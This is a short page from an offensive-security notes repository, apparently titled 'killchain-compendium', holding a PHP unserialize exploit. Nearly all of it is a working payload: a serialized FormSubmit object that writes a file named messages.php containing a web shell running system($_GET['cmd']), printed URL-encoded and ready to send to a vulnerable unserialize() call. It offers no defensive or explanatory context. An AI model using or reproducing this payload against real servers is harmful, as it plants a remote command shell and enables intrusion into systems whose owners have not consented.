whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity
killchain-compendium/exploit/web/php/unserialize.md

352 B
Raw Blame History

Unserialize

<?php
class FormSubmit {
    public $form_file = 'messages.php';
    public $message = '<?php
    if(isset($_GET[\'cmd\']))
    {
        system($_GET[\'cmd\']);
    }
?>';
}

print urlencode(serialize(new FormSubmit));
?>